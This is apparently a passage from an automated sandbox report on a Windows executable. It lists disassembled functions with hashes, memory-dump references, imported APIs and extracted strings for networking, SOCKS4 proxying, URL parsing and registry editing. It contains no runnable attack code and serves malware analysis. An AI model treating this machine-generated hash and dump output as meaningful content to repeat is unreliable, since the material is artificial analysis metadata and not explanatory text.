                                                                                                                                                • Opcode ID: d4134f27dd97e73f3bdd7b499c4dcc1e4e4a61e26dd9816ff9f7023de7f7fc37
                                                                                                                                                • Instruction ID: 75534178eb80ec6e01f5b725a3f01c20fca299c0e1baefff308e87dfc00cab52
                                                                                                                                                • Opcode Fuzzy Hash: d4134f27dd97e73f3bdd7b499c4dcc1e4e4a61e26dd9816ff9f7023de7f7fc37
                                                                                                                                                • Instruction Fuzzy Hash: B241A725A5A2410EDB15803858943A61B0397F732AF68DBACF811897DBE13BC65FD345
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00428690, Relevance: .1, Instructions: 145COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8c7853290da08b1c4ccdb9405d183808ad07ce792adb1b7bd51d2deab51b8cf1
                                                                                                                                                • Instruction ID: f4e65f016ee5d7650a961780782532b43604d62e7cd39c56d4980200ac8f2309
                                                                                                                                                • Opcode Fuzzy Hash: 8c7853290da08b1c4ccdb9405d183808ad07ce792adb1b7bd51d2deab51b8cf1
                                                                                                                                                • Instruction Fuzzy Hash: 19515276A05A018FD718CF2AC580546F7E3FFDD31072AC699C5599B32AD730F842DA94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0046251D, Relevance: .1, Instructions: 144COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 7843b180895422b3b0bcc0ba4a262943549954c7f4171b96b157888fc70d2e22
                                                                                                                                                • Instruction ID: f0f5bba2842bb07d33bec44bd691a946f0f1e101ba1c31b0fc442c3623c76d97
                                                                                                                                                • Opcode Fuzzy Hash: 7843b180895422b3b0bcc0ba4a262943549954c7f4171b96b157888fc70d2e22
                                                                                                                                                • Instruction Fuzzy Hash: B1518BF390D3985BD3249FA5CC8129AF3E0BFD8250F4B872DED88E7601EB7596419681
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00490370, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                • Instruction ID: 0aef348246a36b2d951103fe81851972c988d3d3e073ba7f9e62acd741cb6683
                                                                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                • Instruction Fuzzy Hash: 96117D772011524FDF248A3DC8B46BBEF96EBC5320B2C437BDD428B758D22AD9529508
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004B8158, Relevance: 89.4, APIs: 1, Strings: 50, Instructions: 135COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strncpy
                                                                                                                                                • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                                                                                                                                                • API String ID: 2961919466-3442644082
                                                                                                                                                • Opcode ID: 370d97a26fd55fe5312427e04acd8e9d242e03e4aca6ce45750c7614cb2e2111
                                                                                                                                                • Instruction ID: ef936eaeead06bc4e06970c8d829bb005022ba1551b8e6dedf1dfb4c912dd13a
                                                                                                                                                • Opcode Fuzzy Hash: 370d97a26fd55fe5312427e04acd8e9d242e03e4aca6ce45750c7614cb2e2111
                                                                                                                                                • Instruction Fuzzy Hash: 4E41123021EE8E86C718421855985BE18D8A700B417ADE56FAF03CE290DA1F9D47E3BF
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004B0C32, Relevance: 72.2, APIs: 23, Strings: 18, Instructions: 446COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen$__fprintf_l_sscanf_strpbrk
                                                                                                                                                • String ID: %15[^:]://%[^/?]%[^]$%15[^:]:%[^]$%25$%[^/?]%[^]$://$<url> malformed$DICT.$FTP.$IMAP.$Illegal characters found in URL$Invalid IPv6 address format$LDAP.$POP3.$Please URL encode %% as %%25, see RFC 6874.$Rebuilt URL to: %s$SMTP.$file$PO
                                                                                                                                                • API String ID: 927942060-2579517905
                                                                                                                                                • Opcode ID: f619729756c6dcac7c04b87b72672ded9ceeb926a3222fbdcdf4aafdfea8507d
                                                                                                                                                • Instruction ID: e4dc228a71555aecc3257a371c6e3ed86abc4b99a4fa64eb09998f20697bc6c5
                                                                                                                                                • Opcode Fuzzy Hash: f619729756c6dcac7c04b87b72672ded9ceeb926a3222fbdcdf4aafdfea8507d
                                                                                                                                                • Instruction Fuzzy Hash: FCE1A271904609AFEF10ABB5DC42BEF7BA9EF05314F10041BFA04A6252EB7D99018B7D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00402B0B, Relevance: 49.4, APIs: 23, Strings: 5, Instructions: 430registrystringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • lstrcmpiW.KERNEL32(>%@,Delete), ref: 00402B79
                                                                                                                                                • lstrcmpiW.KERNEL32(>%@,ForceRemove), ref: 00402B88
                                                                                                                                                • lstrlenW.KERNEL32(>%@), ref: 00402C17
                                                                                                                                                • lstrcmpiW.KERNEL32(>%@,NoRemove), ref: 00402C69
                                                                                                                                                • lstrcmpiW.KERNEL32(>%@,Val), ref: 00402C94
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020006,?), ref: 00402D3B
                                                                                                                                                • RegDeleteValueW.ADVAPI32(?,?), ref: 00402D56
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D6E
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,>%@,00000000,0002001F,?), ref: 00402DB8
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402DCA
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,>%@,00000000,00020019,00000000), ref: 00402DFB
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402E08
                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,>%@,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00402E35
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402E4A
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,>%@,00000000,00020019,00000001), ref: 00402EAD
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402EC3
                                                                                                                                                • lstrlenW.KERNEL32(>%@), ref: 00402F34
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402FA7
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0040301F
                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0040304D
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040306B
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00403094
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004030B1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Close$Openlstrcmpi$Deletelstrlen$CreateValue
                                                                                                                                                • String ID: >%@$Delete$ForceRemove$NoRemove$Val
                                                                                                                                                • API String ID: 865444135-3142799315
                                                                                                                                                • Opcode ID: 947f2cd8be5cd7703c7e5f0434b6d1b933b11ce1d6eceb589e5fd956eb16a2d7
                                                                                                                                                • Instruction ID: d313f38c03f155d1a0c9b4e306f312808d35ecdb7d7cfabd05011026114f2235
                                                                                                                                                • Opcode Fuzzy Hash: 947f2cd8be5cd7703c7e5f0434b6d1b933b11ce1d6eceb589e5fd956eb16a2d7
                                                                                                                                                • Instruction Fuzzy Hash: F6E19D715083129BC721DF25C988A2FB6E8AB84795F10093FF845B72D1D7B8CD44DBAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004BE23B, Relevance: 36.9, APIs: 13, Strings: 8, Instructions: 147COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE279
                                                                                                                                                • __allrem.LIBCMT ref: 004BE2A0
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE2AD
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE2BC
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE2E1
                                                                                                                                                • __allrem.LIBCMT ref: 004BE305
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE312
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE321
                                                                                                                                                • __fprintf_l.LIBCMT ref: 004BE332
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE352
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE376
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE38C
                                                                                                                                                • __fprintf_l.LIBCMT ref: 004BE39D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem__fprintf_l
                                                                                                                                                • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                                                                                                                                • API String ID: 1461520624-2102732564
                                                                                                                                                • Opcode ID: e818df50e409ee096e6164f849e58c36f407fd942ec9aeaa9d2fd772b0ac3b33
                                                                                                                                                • Instruction ID: fd4231aeeef7849f038faa87b259389f1066b07c686a06f05a4d6b103965d880
                                                                                                                                                • Opcode Fuzzy Hash: e818df50e409ee096e6164f849e58c36f407fd942ec9aeaa9d2fd772b0ac3b33
                                                                                                                                                • Instruction Fuzzy Hash: 9D318BE26442197DF920251F5D82FFF186CEBE3BA8F10505FBE06A248285AD2C41617E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041B2C6, Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 152libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041B2CB
                                                                                                                                                • _memset.LIBCMT ref: 0041B31D
                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0041B338
                                                                                                                                                • _memset.LIBCMT ref: 0041B37B
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0041B3AD
                                                                                                                                                • LoadLibraryW.KERNEL32(userenv.dll), ref: 0041B3D8
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0041B3F1
                                                                                                                                                • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0041B3FD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc_memset$CloseH_prologHandleLibraryLoadVersion
                                                                                                                                                • String ID: "%s" %s$0$CreateEnvironmentBlock$D$DestroyEnvironmentBlock$userenv.dll$|P
                                                                                                                                                • API String ID: 3240376209-1693829574
                                                                                                                                                • Opcode ID: ae0502583fdadc9b1cef92487fb476a0e2f06a704a7e58755340d9e88085bda3
                                                                                                                                                • Instruction ID: 5c28ccc2b5366bde6329770190cb59f2daad24da2ac4220faca16b76955ae46f
                                                                                                                                                • Opcode Fuzzy Hash: ae0502583fdadc9b1cef92487fb476a0e2f06a704a7e58755340d9e88085bda3
                                                                                                                                                • Instruction Fuzzy Hash: F2513B71C0010DEFDF11AFA5CC859EEBBB9FF08349F10802AE615B2251D7395A858BA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004BC7D6, Relevance: 33.6, APIs: 5, Strings: 14, Instructions: 332COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • Connection time-out, xrefs: 004BC835
                                                                                                                                                • Failed to resolve "%s" for SOCKS4 connect., xrefs: 004BC954
                                                                                                                                                • %hu.%hu.%hu.%hu, xrefs: 004BC8F7
                                                                                                                                                • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed., xrefs: 004BCB59
                                                                                                                                                • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids., xrefs: 004BCB03
                                                                                                                                                • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown., xrefs: 004BCACE
                                                                                                                                                • SOCKS4 communication to %s:%d, xrefs: 004BC85B
                                                                                                                                                • Too long SOCKS proxy name, can't use!, xrefs: 004BC983
                                                                                                                                                • SOCKS4%s request granted., xrefs: 004BCB77
                                                                                                                                                • SOCKS4 reply has wrong version, version should be 4., xrefs: 004BCA85
                                                                                                                                                • Failed to send SOCKS4 connect request., xrefs: 004BCB9A
                                                                                                                                                • Failed to receive SOCKS4 connect request ack., xrefs: 004BCB93
                                                                                                                                                • SOCKS4 connect to %s (locally resolved), xrefs: 004BC936
                                                                                                                                                • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client., xrefs: 004BCB2E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __fprintf_l_strlen
                                                                                                                                                • String ID: %hu.%hu.%hu.%hu$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Connection time-out$Failed to receive SOCKS4 connect request ack.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$SOCKS4 communication to %s:%d$SOCKS4 connect to %s (locally resolved)$SOCKS4 reply has wrong version, version should be 4.$SOCKS4%s request granted.$Too long SOCKS proxy name, can't use!
                                                                                                                                                • API String ID: 2029578563-568593966
                                                                                                                                                • Opcode ID: 19f6444e9f45393f5684012ab68fbe43289d4ad80421b1b286a1ee27e3cbbdd9
                                                                                                                                                • Instruction ID: 48940c236c3581d4c5a8e2ffc906d46e80cb2f334ad4048a61ea3c5b1ae998cc
                                                                                                                                                • Opcode Fuzzy Hash: 19f6444e9f45393f5684012ab68fbe43289d4ad80421b1b286a1ee27e3cbbdd9
                                                                                                                                                • Instruction Fuzzy Hash: 9CB1E3B180819CAEDF319AA58CC1FFF7BB89F19305F24001BF940F6182D66D9A059B79
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0049AA20, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _strcpy_s.LIBCMT ref: 0049AA8C
                                                                                                                                                • __invoke_watson.LIBCMT ref: 0049AA9D
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,0050EDD1,00000104,0049AF7A,00000001,00000214), ref: 0049AAB9
                                                                                                                                                • _strcpy_s.LIBCMT ref: 0049AACE
                                                                                                                                                • __invoke_watson.LIBCMT ref: 0049AAE1
                                                                                                                                                • _strlen.LIBCMT ref: 0049AAEA
                                                                                                                                                • _strlen.LIBCMT ref: 0049AAF7
                                                                                                                                                • __invoke_watson.LIBCMT ref: 0049AB24
                                                                                                                                                • _strcat_s.LIBCMT ref: 0049AB37
                                                                                                                                                • __invoke_watson.LIBCMT ref: 0049AB48
                                                                                                                                                • _strcat_s.LIBCMT ref: 0049AB59
                                                                                                                                                • __invoke_watson.LIBCMT ref: 0049AB6A
                                                                                                                                                • GetStdHandle.KERNEL32(000000F4,00000001,00000001,00000000,77E34620,00000003,0049ABEC,000000FC,0048E3CB,00000001,00000000,00000000,?,004994D0,0049AF7A,00000001), ref: 0049AB89
                                                                                                                                                • _strlen.LIBCMT ref: 0049ABAA
                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004994D0,0049AF7A,00000001,00000001,00499DC5,00000018,00500298,0000000C,00499E54,00000001), ref: 0049ABB4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                                                                                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                • API String ID: 1879448924-4022980321
                                                                                                                                                • Opcode ID: 39b36d9f9ff413034331b55d55a7594fc6a34cbd790f1d950c9e7be3ec3bca07
                                                                                                                                                • Instruction ID: baa430f7f53842fbb56f29521c4e879f46f90ef76b4d5e1b54ab1bb88b2fc185
                                                                                                                                                • Opcode Fuzzy Hash: 39b36d9f9ff413034331b55d55a7594fc6a34cbd790f1d950c9e7be3ec3bca07
                                                                                                                                                • Instruction Fuzzy Hash: 1D3128629012157EEE2136265C0AF7F3E4E9B22319F14053BFE0592283EA4D9A2581FF
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004B6BBB, Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 115libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 004B6C16
                                                                                                                                                • _strcpy_s.LIBCMT ref: 004B6C38
                                                                                                                                                • _strcat_s.LIBCMT ref: 004B6C4A
                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,00000000), ref: 004B6C5F
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004B6C6D
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004B6C78
                                                                                                                                                • _strcpy_s.LIBCMT ref: 004B6C90
                                                                                                                                                • _strcat_s.LIBCMT ref: 004B6CA2
                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004B6CB1
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004B6CBF
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004B6CCA
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004B6CDD
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004B6CF4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
